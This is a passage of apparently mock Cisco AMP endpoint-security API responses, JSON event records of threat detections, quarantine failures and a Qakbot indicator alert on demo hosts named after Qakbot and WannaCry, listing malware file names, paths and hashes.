Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239046651838000,"timestamp":1610637527,"timestamp_nanoseconds":932000000,"date":"2021-01-14T15:18:47+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492807649948000000,"timestamp":1610635719,"timestamp_nanoseconds":948000000,"date":"2021-01-14T14:48:39+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610635719,"start_date":"2021-01-14T14:48:39+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Unknown","file_name":"yuyfhonu.exe","file_path":"/C:/Users/johndoe/AppData/Roaming/Microsoft/Yuyfhonuu/yuyfhonu.exe","identity":{"sha256":"6b7d5fdf4b9d42a985cf861c5ef28f5fa914b418c22e4bf5b56bac12251bcd6c"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":664000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":430000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 